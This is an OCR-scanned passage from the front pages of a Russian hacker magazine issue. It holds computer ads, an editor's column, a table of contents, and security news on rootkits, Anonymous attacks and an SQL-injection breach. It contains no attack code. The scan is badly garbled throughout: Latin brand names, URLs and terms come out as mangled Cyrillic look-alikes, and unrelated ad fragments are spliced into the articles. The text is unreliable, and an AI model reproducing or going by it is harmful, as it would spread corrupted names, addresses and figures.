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АЗІІЗ рекомендует ѴѴіпсІоѵѵз® 7. 



А$Ц$ серии ЕТ2400 

Моноблочные компьютеры 



Іпзрігіпд Іппоѵаііоп • Регзізіепі РегТесІіоп* 



Моноблочный компьютер АЗІІЗ ЕТ2400ХѴТ на базе процессора ІпіеІ® Соге™ І7 подарит 
незабываемые эмоции всем любителям компьютерных игр, благодаря подлинной операци- 
онной системе ѴѴіпбоѵѵз® 7 Домашняя расширенная и поддержке технологии стереоскопи- 
ческого изображения ІМѴЮІА 30 Ѵізіоп. Аудиосистема компьютера ЕТ2400ХѴТ способна 
воспроизводить широкий диапазон частот, в частности глубокий и мощный бас. Ее звуча- 
ние придется по вкусу всем пользователям, независимо от воспроизводимого материала, 
будь то фильмы, игры или музыка. 

Благодаря множеству современных технологий, обеспечивающих превосходную произво- 
дительность, АЗІІЗ ЕТ2400ХѴТ изменит ваши представления о работе и развлечениях. 
Кроме того, оригинальная система управления энергопотреблением АЗІІЗ Зирег НуЬгісІ 
Епдіпе делает данный компьютер весьма энергоэффективным. Также в модели ЕТ2400ХѴТ 
имеется уникальная для моноблочных компьютеров возможность увеличивать объем сис- 
темной памяти. Для доступа к слотам памяти достаточно лишь снять крышку соответствую- 
щего отсека. 

Горячая линия АЗІІЗ: (495) 23-11-999, 8-800-100-2787 

Горячая линия НОТИК: (495) 23-11-488; 8-800-100-1488 Гарантия 1 год 
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МАГАЗИНЫ НОУТБУКОВ 



*Дух инноваций, Путь к совершенству 
Товар сертифицирован, на правах рекламы. 



Іпіеі, логотип Іпіеі, Іпіеі Іпзісіе, Іпіеі Соге и Соге Іпзісіе являются товарными знаками корпорации ІпіеІ на территории США и других стран. 
Для получения дополнительной информации о рейтинге процессоров Іпіеі посетите сайт ѵѵѵѵѵѵ . і пТе I . г и/гаТі п д . 
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Баянистая история с проиндексированными 
Яндексом ЗМЗ’ками, ж/д билетами и информа- 
цией о покупках в секс-шопах сыграла журналу 
на руку. В течение примерно недели ко мне 
ежедневно обращались от 3 до 5 раз с просьбой 
о комментарии или интервью. Благодаря этому 
удалось хорошо попиарить журнал и на радио, 
и на телеке: радио Маяк, канал Россия 1, Вести 
РМ, Русская служба ВВС и разные другие СМИ 
— спасибо за интерес к защите персональных 
данных :). 

Сама история довольно безынтересная и 
уже давно поднадоела, но забавно, что все 
это вызывает неподдельный интерес у масс- 
медиа и обычных людей. Воистину: чужие зглз 
и покупки анальных затычек трогают людей 
гораздо сильнее, чем все громкие суЬегсгіте- 
истории на миллионы долларов вместе взятые. 
Что людям до миллионов, когда эсемесочки 
опасносте? 



Есть и другое занятное наблюдение. 
Практически все мои собеседники, узнав, что 
хакеры тут ни при чем, посредством неслож- 
ных индукционных размышлений приходили 
к тезису о том, что это точно кто-то спланиро- 
вал: заранее заготовил пяток крутых историй и 
начал методично их сливать. Однако без внят- 
ной цели такая активность не имеет смысла — а 
какую-либо внятную цель тут придумать крайне 
сложно. 

Учитывая, что у истории нет и никакого про- 
должения в виде национальной программы 
«Удвоение безопасности личных данных к 
2015 году», лично я эту теорию заговора не 
разделяю. В конце концов, поисковики всю 
свою жизнь индексируют секретные данные, а 
боодіе-баск всегда был прекрасным развлече- 
нием. 

пікііоіі, гл. ред. X 
ѵкоп*ак*е.ги/хакер_тад 
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004 Все новое за последний месяц 

Реггит . 

016 Согризѵиідагіз 

Тестирование корпусов среднего ценового диапазона 

020 Изящный гигант 

Тестирование монитора Заппзипд 527А75СЮ 

021 Только Регрессировать! 

Тестирование высокопроизводительного сетевого 
накопителя ОІЧАРТ5-459 Рго II 

РС_2опе. 

022 Быстро восстановил — 
значит, не удалил 

Выбираем правильную программу для восстановления данных 

027 РгооРоРСопсерІ: 

Разработать сканнер 50І_-уязвимостей меньше 100 строк кода 

028 Колонка редактора 

Про мультизагрузочную флешку 

029 Ыѵе-системы 

Дистрибутивы для твоей флешки 

030 Хак-машина избоодІеСЬготе 

Собираем хакерскую сборку расширений для браузера отСоодІе 

036 Правильные 1)1 -хаки дляѴѴІпсіоѵѵ5 7 

+5 кудобству работы системы 

Взлом. 

040 Еазу-Наск 

Хакерские секреты простых вещей 

044 Обзор эксплоитов 

Анализ свеженькихуязвимостей 

050 ЗаѵаЗсгірІ:: игры в прятки 

Прячем, обфусцируем и криптуем клиентскую 
часть веб-приложений 

056 Ложка дегтя для боодіе 

Клоакинг как средство выживания в поисковых системах 

060 ОѴѴАЗРАррЗес Еигоре 201 1 : 
как это было? 

Отчете крупнейшей конференции по веб-безопасности в 
Европе 

063 ЬаскегІѵѵееЩ 

Хак-сцена в твиттере 

064 рИрМуАсІтіп на лопатках 

Взлом известного движка с помощью нашумевшего бага 
в глобализации переменных 

068 Х-Тооіб 

Программы для взлома 



МАІ.ѴѴАКЕ. 

070 АпбгоісІ-убийца 

Разбираем малварьдля популярной мобильной системы 

073 Бгіѵе-Ьу-Боѵѵпіоасі по-тихому 

Маскируем вредоносные сайты отѵѵераѵѵеі: и его друзей 

Сцена. 

076 Пацан куспеху шел 

Павел Врублевский: ВебЕуе, СгіЛор, РеЛаагсІ и СЬгопорау 

082 Буга га шечки ради 

Хроника деяний БиІгЗес 

088 Рѵѵпіе Аѵѵагсіз 201 1 

Пятая ежегодная хакерская премия: какэто было? 

Юниксойд, 

092 Большой брат и зеленый робот 

Выбираем лучший АпбгоісІ -софт для взаимодействия с компом 

098 38 попугаев 

Обзор утилит для тестирования производительности 

102 Посторонним вход воспрещен 

Используем современные методы входа в систему 

Кодинг. 

106 Покоряем ѴѴІпсІоѵѵз Рбопе 7.1 

Начинаем кодить игры под новую ось, конкуренты не дремлют! 

110 Руткитвсетевухе 

Фантазии системного программиста о создании 
непобедимого руткита 

114 Веб по-асинхронному 

Обзор асинхронных фрейм ворков для РуЛаоп 

118 Программерскиетипсы итриксы 

Паттерн проектирования «Стратегия» 

5ѴЫ/АСК. 

122 Сеть из файлов 

Распределенные файловые системы наших дней 

128 Конечнаяточка защиты 

Рогебгопі; Епфоіпі: РгоІесЛоп: решение для защиты 
компьютеров с ѴѴіпсІоѵѵз 

132 Ударь копирайтом по работодателю! 

Возвращаем финансы, честно заработанные 
на служебных произведениях 

РНКЕАКШС. 

136 Запираем комп на амбарный замок 

Делаем электронный замокдля компа на ключах іВиЛюп 

Юниты 

140 БАСШІХІТЕБ 

Большой РАО 

143 Диско 

8.5 Гб всякой всячины 

144 ѴѴѴѴѴѴ2 

Удобные ѵѵеЬ-сервисы 





Быстро восстановил — 
значит, не удалил 

Выбираем правильную программу для восстановле- 
ния данных 
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Разбираем малварьдля популярной мобильной системы 
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>Главный редактор 

Никита «пікііоіг» Кислицин 
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Маг (таддйгеаі.хакер.ги) 

КОДИ Н Г, МАЬѴѴАКЕ и 5УЫ/АСК 
Александр «Ог. Кіоипіг» Лозовский 
(аіехапсіегйгеаі.хакер.ги) 
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Андрей «АпсІгизИоск» Матвеев 
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Запираем комп наамбарный 
замок 

Делаем электронный замокдля компа на ключах іВиІТоп 
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Некоторые люди считают, что дополнительная безопасность не может 
быть излишней. Им мало имеющегося в наличии шифрования, установ- 



ленных анти вирусов, 20-символьных паролей. Специально для таких 
личностей компания ѴѴЬізрегЗузіеппз Гл/ѵѵѵѵ.ѵѵЬізрегзѵз.сопп ) разработала 
(и уже представила публике] альтернативную прошивку для устройств 
на платформе АпсІгоісІ. Время релиза выбрано очень грамотно: сейчас 
чутьли не каждую неделю выходит сообщение о какой-нибудь новой 
угрозе для мобильной платформы отСоодІе. На данный момент детище 
компании — ѴѴЬізрегСоге — доступно лишь в виде бета-версии, причем 
только для смартфонов ЫехизЗ (ЗѲ) и ЫехизОпе, ноужесейчас можно 
понять, что разработка довольно интересна. Делотут вот в чем. Аль- 
тернативные прошивки с прокаченной безопасностью появились не 
сегодня и не вчера. Но используемые в них способы защиты данных не 
выдерживают никакой критики: к критическим типам ресурсов банально 
полностью ограничивался доступ. Многие приложения такого жестокого 
обращения не выдерживают и попросту падают. ѴѴЬізрегСоге, в свою 
очередь, действует нетактопорно. Вместо полной блокировки доступа 
«куда не надо», данная прошивка создает и подсовываетлюбопытным 
приложениям фиктивные данные. Кпримеру, если какая-то программа 
захочетузнать ІМЕІ девайса, она получит фальшивый идентификатор, 
сгенерированный специально для нее. В ответ на запрос в доступе к 
списку контактов приложение получит пустой список, а вместо настоящих 
О Р5-координат — липовые. Ктомуже прошивка обеспечивает шиф- 
рование пользовательских данных и информации на 50-карте, имеет 
межсетевой экран ѴѴЬізрегМопког, позволяющий контролировать доступ 
различных приложений кСети в режиме реального времени, и систему 
резервного копирования РІазЬВаск, которая помещает данные в облако, 
предварительно ихзашифровав. 




6 из 10 копий АсІоЬе Кеабег являются устаревшими и, соответственно, 
уязвимыми - сообщает компания Аѵазі. 



ДВА ДИСПЛЕЯ, ОДИН НОУТ 

Если посмотреть фоторепортажи из офисов различныхтехнологических 
компаний, несложно заметить, что многие профи предпочитают работать 
не на одном большом мониторе, а на двух-трех небольших. Это дей- 
ствительноудобно и позволяетзначительно оптимизировать рабочий 
процесс. Тем, кто часто трудится вне офиса и мечтает, чтобы у ноутбука 
было сразу два дисплея, решила порадовать компания ОЗсгееп. Ноутбук 
ОЗсгееп ЗрасеВоок оснащается двумя 17-дюймовыми дисплеями, 
каждый из которых имеет разрешение 1920x1 080 точек. Как расположе- 
ны мониторы, хорошо видно на иллюстрации. Разумеется, такого рода 
устройство едва ли может быть компактным: его вес составляет 1 0 фунтов, 
то есть4,54 кг! Нотутуж каждый сам выбирает, что для него наиболее 
важно. Новинка представлена в двух вариантах — один немного мощнее, 
второй попроще. Младшая модельоснащена процессором ІпіеІСоге І5- 
560М 2,66 ГГц, 4 ГБ памяти ББР и дискретной видюхой. Старшая модель, в 
свою очередь, может похвастаться процем Іпіеі Соге І7-740ОМ (1 ,73 ГГц] и 
большим количеством оперативной памяти (8 ГБ). Интересный гаджет сто- 




итнедешево: $2395 для младшей модели и $2795 — для старшей. Однако 
сейчас на них действует 50% скидки по предзаказу. 
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ШІІК.НОМЕ 903 

Много лет назад мы все заморачивались покупкой комьютера по частям и самостоятельно 
собирали его, посмеиваясь над производителями готовых сборок (и непременно теми, 
кто их покупает). Мол, и железо они подбирают не оптимальное, и продают втридорога. 
Романтика ЬапсІусгаЛ'а давно ушла, пришел простой расчет. Оказалось, что готовые сборки с 
установленной системой зачастую обходятся дешевле, чем собирать компьютер самому. Легче 
пойти в магазин и купить компьютер с классной конфигурацией за хорошую цену. В случае 
с ѴѴЕХІ.ЕК.НОМЕ 903 с 64-битной ѴѴіпсІоѵѵз® 7 на борту ты получаешь практически топовую 
машину, которая идеально подойдет для игр. 




В качестве процессора используется мощный двухядерный процес- 
сор Іпіеі® Соге™ І5-650 с частотой 3,2 ГГц и кэш-памятью 4 Мб. СРІІ 
имеет встроенный контроллер памяти и поддерживает технологию 
ТигЬо Воозр автоматически разгоняющую его под нагрузкой (напри- 
мер, в последних играх). Более того, такие процессоры поставляют- 
ся еще и со встроенным контроллером памяти. 

Видео 

За игровые возможности отвечают две видеокарты ОеГогсе ѲТХ 460, 
основанные на новейшей вычислительной архитектуре «Гегті». 
Благодаря высокой производительности в режиме БігесіХ 11 тес- 
селяции процессор 6ТХ 460 обеспечивает идеально четкую гра- 
фику без ущерба для скорости, а поддержка технологий ІМѴЮІА ЗБ 
ѴІБІоп™, РбузХ® и США™ позволяет визуализировать все самые 
потрясающие эффекты, на которые способны компьютерные игры. 
Просто выставляй настройки графики на максимум. 

ОЗУ 

Компьютер ѴѴЕХІ_ЕР.НОМЕ 903 укомплектован оперативной памятью 
4 Гб, работающей в двухканальном режиме. Благодаря этому работа 



с каждым из двух установленных модулей памяти осуществляется 
параллельно. Пускай технология и не дает теоретического увеличе- 
ния пропускной способности в два раза, но, тем не менее, вносит 
ощутимый результат. 

Блок питания 

Набор мощного железа не может обойтись без надежного пита- 
ния. В ѴѴЕХІ_ЕР.НОМЕ электропитание осуществляется с помощью 
надежного блока питания мощностью 750 Вт. Это даже больше, чем 
нужно, но зато обеспечивает хороший запас надежности. 

Софт 

На всех компьютерах ѴѴЕХІ_ЕР. НОМЕ 903 предустановлена операци- 
онная система ѴѴіпсІоѵѵз® 7 Домашняя расширенная. Использование 
именно 64-битной версии не случайно: благодаря этому удается 
задействовать все 4 Гб установленной в компьютере памяти. Помимо 
ОС, дополнительно установлен бесплатный антивирус МісгозоЛ® 
Эесигііу Еззепбаіз и ОШсе 2010 Зіагіег (включает в себя ограничен- 
ный функционал ѴѴогб® и Ехсеі®, для активации полнофункциональ- 
ной версии необходимо приобрести ключ продукта). 



Місюзо/і 




ѴѴіпсІоѵѵ$7 

Домашняя расширенная 



Мы рекомендуем подлинную ОС ѴѴіпсІоѵѵз® 7. 



шехсег 

V 



ЗАО «БТК» — официальный дистрибутор 
техники ѴѴЕХБЕР в России 
Единая служба поддержки ѴѴехІег: 

+7 ( 800 ) 200-9660 
ѵѵѵѵѵѵ.ѵѵехіег.ги 



© Владельцем товарного знака МісгозоЛ:® и логотипа ѴѴіпсІоѵѵз® 7, зарегистрированных на территории США и/или других стран, и владельцем авторских прав 
на его дизайн является корпорация МісгозоК®. 



РЕКЛАМА 




МЕ6АЫЕШ5 



КАСПЕРСКИЙ В КОЗЬМОДЕМЬЯНСКЕ 



Раз в год высокопоставленный агент КГБ Евгений Касперский 
устраиваетэкспедиции в населенные пункты, находящиеся у всех на 
слуху, но, тем не менее, вызывающие сомнение даже самим фактом 
своего существования. В прошлом году это был Урюпинск. В этом 

— Козьмодемьянск (знамениттем, что является прообразом Нью- 
Васюков — шахматной столицы будущего из Ильфопетровских «12-ти 
стульев»]. На этот раз на теплоход, забравший целую толпу блоггеров, 
журналистов и сотрудников Л К из Нижнего Новгорода и отправивший 
их в Козьмодемьянск, попали целых три сотрудника журнала «Хакер» 

— главред Никита Кислицин, редактор Маіѵѵаге Саша Лозовский и 
наш главный краш -л а бора нт, лютый враг антивирусов и проактивных 
защит — сіееопіз. Как туда попал последний гражданин — лучше и 

не спрашивай, потому что ответ будет неожиданным: его тоже при- 
гласили. Видимо, в надежде зомбировать и внушить ему почтение к 
защитному программному обеспечению. 

Самотрехдневное мероприятие, состоящее изтрансфера Москва- 
Нижний Новгород на «Сапсане», заплыва из Новгорода в Козьмо- 
демьянск на гигантском теплоходе «Георгий Жуков» и последующим 
дичайшем угаре в самом историческом городе оказалось настолько 
масштабно, что мы мало что из него запомнили. Поэтому расскажем 
только о том, что осталось в памяти. 

• Мы там выступали. На одной из секций слово было представлено Ни- 
ките, который продемонстрировал, насколько легко можно отснифать 
в местном вайфае активные сессии ВКонтакте/иѵещигпаІ/РасеЬоок и 
как следует отжечь в чужом виртуальном пространстве. Присутствую- 
щие журналисты испытали некоторое удивление, а сидящий рядом 



со мной Бееопіз во время никитиного выступления беспокоился и ак- 
тивно пытался выкрикивать что-то вроде «я торгую ѴРІЧ’ом! Покупайте 
мойЗтагЖісІе.ивас никто не сможет отснифать, кроме меня самого!». 
За попытку рекламы своего софта Владимира поймали местные качки- 
охранники, привязали его кякорной цепи и... Нет, погодите, сіееопіз’а 
на самом деле никто не ловил. Имел место совсем другой инцидент: 
через день мы узнали, что какой-то хитрый блогер поссорился с дру- 
гим блогером на почве угона его аккаунта с использованием описан- 
ного Никитой нехитрого способа. 

• Рассказ про кибероружейные свойства БіыхпеЕ портящего — и, 
похоже, на момент выхода этой статьи, уже испортившего иранские 
урановые центрифуги, был очень интересным. Правда, мы все равно 
писали об этом интереснее :). 

• Порадовал доклад господина из МісгозоК, Андрея Бешкова. Не 
контентом, конечно — а своим неповторимым стилем. Дело в том, 
что ситуацию с безопасностью мобильных майкрософтовских осей 
он прокомментировал примернотак: «То, с чем сейчас сталкивается 
Арріе, мы прошли много лет назад». Такие дела, дорогой читатель. То, 
что у Майкрософт вирусов много, а у Эппл — мал о, означает лишь то, 
что Стив Джобс менее опытен в этом направлении, и великие тысячи 
вирусов очень скоро обвалятся на его многострадальную голову :]. 

• В Козьмодемьянск приезжал сам Министр связи вместе со свитой из 
десятка Черных Автомобилей С Синими Мигалками. Из круглого стола 
с Игорем Щеголевым мы вынесли главную мысль, которая обрадова- 
ла: лезть в интернет и выдумывать какие-то излишние регулировки 
министр не намерен, так как считает это нецелесообразным. И натом 
спасибо, тезис сейчас очень важный. 




МісгозоН предлагает вознаграждение в размере $250 000 за любую 
информацию о людях, причастных к ботнету Кизіоск. 



ОБЪЕКТИВЫ ДЛЯ... ІРНОИЕ 










► ооб 
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Чего только не придумают люди. Как из- 
вестно, в іРЬопе от Арріе имеется встроен- 
ная фотокамера, при помощи которой даже 
можно делать неплохие снимки. В Сети есть 
дажезабавный видеоролик 
из профессиональной 
фотостудии, где фото- 
граф использует для 
работы свой айфон, 
прикрепляя его к 
штативу липучкой, и 
по окончании съемки 
демонстрирует 
безупречные снимки 
людей, которые вполне 
могли бы подойти для 
глянцевых журналов. Не- 
которым фанатам очевидно 
сильно хочется, чтобы в бед- 
ный смартфон была встроена 
настоящая, полноценная 
зеркалка, да покруче. Таких 
личностей, очевидно, оказа- 



лось немало, потому как нашлись энтузиа- 
сты, придумавшие решение данной «про- 
блемы». В онлайновом магазине Рбоіощщ 
появился интересный набор, позволяющий 



подключать объективы ЭБР-камер Сапоп и 
ІМі ко п к ка мере іРЬопе’а. На бор включает 
в себя специальный футляр для телефона, 
УФ-фильтр и адаптор для объективов Сапоп 
или N і коп . Обойдется данный комплект 
недешево: стоимость варианта для іРбопе 
3/ЗС5 составляет $1 90, дляіРЬопе4 — $249 
И тем не менее, спрос есть. Фантастика. 






1 сізрс 



МОЛОКО 



- ..; }'»•! 



Вся ттродун^ш »ТЕ8ЬЕ МОЛОЧНИК» произведена из цельного 
0 іеиосстаидоленмоі о) молока очень высокого рачѳстоа. 
Такой строгий контроль оказывается важным и лая людей, 
заботящихся о здоровье, поскольку в последнее время на рынке появилось 
- шошюддвлои. и разбавлений как молока, так и продуктов издаю* 



МЕ6АЫЕШ5 



ЗАРЯЖАЕМСЯ ОТ СОЛНЦА - ѴѴЕХІ.ЕК.ЗІІМ 

Уникальное зарядное устройство недавно выпустила в про- 
дажу компания ѴѴехІег. Гаджет ѴѴЕХЕЕВ.51ЛЧ представляет 
собой мобильную солнечную батарею, которая преобра- 
зовывает солнечные лучи в электроэнергию. Устройство 
пригодится всем тем, кто часто оказывается оторван от благ 
цивилизации, но не хочет таскать при себе полный рюкзак 
батареек. Новинку можно использоваться с мобильным 
телефоном, электронными книгами, цифровыми камера- 
ми, МРЗ/МР4-плеерами, смартфонами, фотоаппаратами. 

Помимо солнечных лучей, встроенную батарею можно 
зарядить и от персонального компьютера посредством 
ІІ5В-кабеля или от электросети 220 В. Устройство способно 
сохранять накопленный заряд до шести месяцев. Кроме 
того батарея компактна (90x40x8,5 мм, вес — всего 45 г] и об- 
ладает стильным, ярким дизайном. Рекомендованная цена 
составляет всего 890 рублей. 

В России очень любят платить за антивирусы. Легальное защитное ПО 
в России установлено на компьютерах 47,83% пользователей, если 
верить исследованию немецкой компании 6 Раіа. Мы обогнали Великобританию 
(47,29%), Нидерланды (47,23%) и даже США (45,4%). 





РУТКИТЫ АТАКУЮТ 




Интересные новости приходят из стана компании Місгозоіі. Инже- 
нер Місгозоіі Маілл/аге Ргоіесііоп Сепію г(ММРС) Чун Фэн написал 
в своем блоге о новой модификации троянца РоригеЬ, с которой 
многим пользователям будет справиться весьма сложно. Новый 
вариант трояна, по словам инженера, забирается так глубоко в 



систему, что единственный способ удалить его — вернуть ѴѴіпсІоѵѵз к 
своей первоначальной заводской конфигурации. 

«Если ваша система заражена трояном Тго]ап :ѴѴі п32/Рори геЬ. Е, мы 
советуем вам исправить главную загрузочную запись, а затем восполь- 
зоваться компакт-диском для восстановления системы, с его помощью 
вернув ОС к состоянию, в котором она пребывала до заражения», — пи- 
шетЧун. Согласись, откатывать систему — не самоеудобное решение 
проблемы, но, увы, других решений Місгозоіі: предложить не может. 
Помимо этого неприятного троянца, «Лаборатория Касперского» 
также отмечает повышенную активность последней версии руткита 
ТОЕ-4 (предыдущая версия ЮЕ-3, также известен как Аіигеоп и 
просто ЮЦ. Данная мал варь только за первые три месяца 2011 
года заразила 4,52 миллиона компьютеров, а новая модификация 
к тому же активно борется с конкурентами. Зараженные ЮЕ-4 
компьютеры очищаются от 20 вредоносных программ -соперников, 
таких как 2еи5, ОЬоі: и 0 рЛ та. Для верности троян также заносит 
командные сервера конкурентов в черный список, дабы не давать 
им нормально работать. Как и упомянутый выше РоригеЬ, ЮЕ-4 по- 
ражает главную загрузочную запись жесткого диска. Кстати, теперь 
зараза способна инфицировать и 64- битные версии ѴѴіпсІоѵѵз. По 
словам сотрудников «Лаборатории Касперского», «владельцы ТО\_ 
пытаются создать несокрушимую ботсеть, защищенную от атак, 
конкурентов и антивирусных компаний». Впрочем, российским 
юзерам, похоже, можно не беспокоиться. Почти треть взломанных 
компьютеров расположены в США, еще 50% — делят между собой 
европейские страны, а вот Россия ЮЕ-4 совсем не охвачена. Дело 
в том, что распространяется ТО\_ через партнерские программы, 
чьи хозяева платят за заражение ТОЕ-4 деньги. Цены варьируют- 
ся в пределах 20-200 долларов за каждые 1000 установок, сумма 
зависит от географического положения компьютера жертвы. Так 
вот — за Россию, равно каки за страны СНГ, ставки минимальны (не 
нужен наш трафик никому, не нужен !]. 



► 008 
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РАДИО 



°1 



ОДНО И НАВСЕГДА 



МЕ6АЫЕШ5 



АНОНИМУСЫ ВОЮЮТ С ЦЕЛЫМИ ГОРОДАМИ 




Хактивистам из числа Анонимусов достаточно лишь найти повод, и 
вот — новая операция стартовала, очередное сражение развязано. 
На этот раз мишенью Анонов стал... американский город Орлан- 
до, штат Флорида. Поводом для «Операции Орландо» послужили 



аресты членов некоммерческой группы РоосІ N оТ ВоппЬб. Последние 
раздавали еду бездомным в городских парках, но делали это, как 
выяснилось, без надлежащего разрешения. Анонимусы заявили: 
«Это объявление войны. Апопутоііз начинает масштабную кампа- 
нию против вас и веб-активов вашего города. Каждый день мы будем 
осуществлять по ООоЗ-атаке на новую цель». Верные своему слову 
хакеры начали с сайта Огіапсіо Ріогісіа 0 и і сіе, который технически 
даже не принадлежит городским властям. 

Также Анонимус в рамках операции АпбЗес взломали очередного 
подрядчика ФБР. Нужно сказать, что компания ІРС Ребегаі работала не 
только с федералами, но и с Министерством обороны, НАСА и другими 
госструктурами, однако не смогла обезопасить собственные серверы, 
за что и поплатилась. 

Через твиттер хакеры сообщили, что системы компании взломаны, 
а базы данных и личные письма скопированы. Если верить сообще- 
нию на сайте РазІеЬіп, взлом был произведен путем использования 
обычной 5СН_-иньекции. В ІРС Ребе га I факт взлома подтверждают, 
однако отказываются от любых дальнейших комментариев. ФБР тоже 
хранитмолчание.АтемвременемнаТЬеРігаІе Вау уже появился 
торрент размером 1 07 Мб, который включает все полученные в ре- 
зультате взлома данные. 




11 млн сайтов из зоны .со.сс выкинул из своего индекса боодіе из-за того, 
что в этой зоне очень высоки показатели спамерской активности и фрода. 




КОРЕЙСКИЙ КИБЕРСПЕЦНАЗ 



Все серьезнее относятся к киберугрозам правительства разных стран 
мира. Совсем недавно власти Южной Кореи обвинили соседствующий 
Пхеньян в том, что тот поддерживает и развивает«элитные хакерские 
подразделения». Послетакихзаявлений, пресс-релиз распростра- 
ненный недавно Министерством обороны страны выглядит вполне 
логичным. Заявление гласит, что власти Южной Кореи в ближайшем 
будущем намереваются создать школы для подготовки специалистов 
в области киберзащиты и кибернападения. Конечноже, речь идет 
не о курсах для всех желающих, а о «воспитании солдат, способных 
бороться в кибервойне на фоне растущих кибертеррористических 



угроз со стороны Северной Кореи». Ожидается, что программа стартует 
в 2012 году, когда в Университете Кореи заработает«школа киберобо- 
роны», где студенты будут проходить полноценный четырехлетний курс 
обучения. Программа подготовки будет состоять из детального иссле- 
дования современных ИТ-решений, овладения навыками программи- 
рования, обучения методам борьбы с различной малварью и из многих 
других дисциплин, вплотьдо психологической и физической подготов- 
ки. По завершении обучения студенты станут действующими офицера- 
ми армии и должны будут отслужить не менее семи лет. Похоже, иметь 
собственный киберспецназ скоро станет признаком хорошего тона. 
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РЕКЛАМА 





ОТБОРНЫЕ ПРОДУКТЫ 

СО ВСЕГО МИРА* 



® Мы знаем, ідев міре найти самые лучшие продукты. 

Вы ЗНЛРП5.ЧТО можете найтііимрвдом, под маркой ТА€Н 



МЕ6АЫЕШ5 



БЛИЗИТСЯ ШМАЯбО 




Корпорация М ісгозоТі; начала распространять обновление Мапдо для 
своей операционной системы ѴѴі псіоѵѵз РЬопе 7. Пока это лишь ранняя 
версия для разработчиков — но релиз ожидается уже скоро. Измене- 
ний грядет немало: в Мапдоулучшатсистему многозадачности, память 
будет распределяться более эффективно, а поддержка сторонних при- 
ложений также будетоптимизирована. Крометого, Мапдо будет поддер- 
живать движок ІЕ 9 с его возможностями по обработке НТМІ_ 5 и аппа- 
ратномуускорению веб-контента. Кстати, все возможности обновления 
будет поддерживать клиент Зкуре для ѴѴіпсІоѵѵз Рбопе 7. Представители 
МісгозоГС уверяют, что с выходом обновления большая часть интернет- 
приложений (скажем, клиентские решения для ТѵѵіНег и РасеЬоок], 
будетзанимать где-то на четверть меньше памяти в ОЗУ смартфонов. 
Тем временем в Лос-Анджелесе на конференции ѴѴогШѵѵісІе Оеѵеіорег 
Сопіегепсе 201 1 уже продемонстрировали первые аппараты под управ- 
лением ѴѴіпсІоѵѵз РЬопе 7.1 Мапдо. Публике показали устройства отАсег, 
Ещіізи, 2ТЕ и Затзипд. Пока ни их детальные характеристики, ни даты 
поступления в продажу неизвестны, однако представители МісгозоЛ 
прогнозируют, что стоить смартфоны будут всего $100-150. Софтверный 
гигантобъясняетэтотем, что комплектующие становятся все более 
доступными, и цены стремительно снижаются. Хотелось бы верить, что 
когда новинки доберутся до нашей страны, они будут стоить именно 
столько, а не какбываетобычно. 



Компания МсАіее будет обеспечивать ежедневное бесплатное 
сканирование для каждого веб-сайта с адресом .ххх. 

За это она получит 8 млн долларов. 

ТЕМНАЯ СТОРОНА ДЖЕЙЛ БРЕЙКА 

Компания Арріе неустает напоминать своим 
клиентам, что джейлбрейк может быть вреден, и 
никакой ответственности за случившееся стаким 
аппаратом Арріе не несет. На этот раз о вреде 
джейлбрейка, разнообразия ради напоминают 
нам не сами «Яббл», а Германское правитель- 
ственное агентство по безопасности. Немцы 
сообщают, что обнаружили в последней версии 
джейлбрейка от команды Оеѵ-Теат [ аіІЬгеакте. 
сот , они самые] существенный недостаток. Дело 
в том, что в Ю5 присутствует некая критическая 
уязвимость. После джейлбрейка появляется воз- 
можность обойти систему защиты отатакАррІе 
А5ЕР (АсІсІгезБЗрасе ЕауоіЛ Рапсіотігабоп] и 
получить удаленный доступ к смартфону. Пона- 
добится для этого трюка всего лишь модифици- 
рованный определенным образом файл РОЕ. В 
Арріе эту информацию подтвердили, но исправ- 
лять проблему не спешат: по словам пресс- 
секретаря компании, уязвимость будет устранена 
только в следующей версии ЮБ. Оеѵ-Теат также 
сообщили, что о дырке им известно, и даже вы- 
пустили инструмент РОЕ Ра1сбег2, закрывающий 
проблему во взломанныхустройствах. Впрочем, 
хакеры подчеркнули, что атаке использованием 
новой уязвимости пока не было, и осуществить 
их в целом довольнотрудно. Однако в твиттере 
уже немало людей посоветовало пропатчить свои 
девайсы перед посещением грядущих крупных 
хакерских конференций. 
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ШЕСТЬ ПРЕДУПРЕЖДЕНИИ СЕТЕВЫМ ПИРАТАМ 



Документ, который в 
конце июля под- 
писали крупнейшие 
американские 
провайдеры, а также 
музыкальные и кино- 
компании, навер- 
няка вверг в пучины 
депрессии многих 
западных любителей 
файлообмена. Оказы- 
вается, переговоры 
об этом соглашении 
и его деталях велись много лет. Провайдеры АТ&Т, Ѵегігоп, Сотсазі:, 
СаЫеѵізіоп и Тіте ѴѴагпегСаЫе долго не решались подписать бумагу 
о так называемых «Шести ударах», но анти пиратское лобби сильно... 



Итак, воткчему пришли стороны. Кино-музыкальная индустрия отныне 
согласилась выявлять пиратов в файлообменных сетях (и нетолько в 
них], после чего их ІР-адреса будут передаваться непосредственно про- 
вайдерам. Провы, в свою очередь, по ІР’шнику будут уста на вливать лич- 
ность «преступника» и высылать уличенному в пиратстве пользователю 
предупреждения. Чем болышетаких«штрафных карточек» набирает 
юзер, тем хуже для него. Максимальное количество — шесть предупре- 
ждений, хотя уже после четырех провайдер имеет право ограничить 
пользователю скорость подключения к интернету или принудительно 
перенаправить его на веб-старницу с подробной информацией о нару- 
шении. Что особенно интересно, провайдеры могут выбирать меры пре- 
сечения на свое усмотрение. Такое чувство, что для выхода в интернет 
на Западе скоро нужно будет показывать в веб-камеру удостоверение 
личности, а любой клик по ссылке того и гляди оберется арестом. Волей 
не волей начинаешь понимать многочисленных хактивистов с их борь- 
бой за сетевые свободы. 





СТИЛЬНЫЕ КОЛОНКИ ДЛЯ НОУТБУКА 



Интересную новинку рада представить тебе, 
дорогой читатель, компания ЕсІіТіег. Модель 
МР250 ориентирована на ноутбуки, так как 
все больше людей предпочитают десктопам 
портативные решения. Итак, если ты часто 
работаешь за лаптопом и любишь хороший 



звук, МР250 как разто, что нужно. Новинка об- 
ладает алюминиевым корпусом, что нетолько 
выглядит стильно, но и предохраняет колонки 
от повреждений при транспортировке. МР250 
нетребуется внешний источник питания — и 
питание и звуковой сигнал поставляются по 



ИЗВ-кабелю отлюбого цифрового девай- 
са. Предполагается, что колонки ты будешь 
носить с собой, наряду с ноутбуком, поэтому 
их размеры весьма скромны: 261 мм х 36мм 
х44мм (ШхВхГ), вес: ~0,33кг. Тем не менее, 
МР250 могут похвастаться полноразмерными 
магнитно-экранированными динамиками. 

НЧ -ди на ми к: овальный размером 3 х 1 ,25 
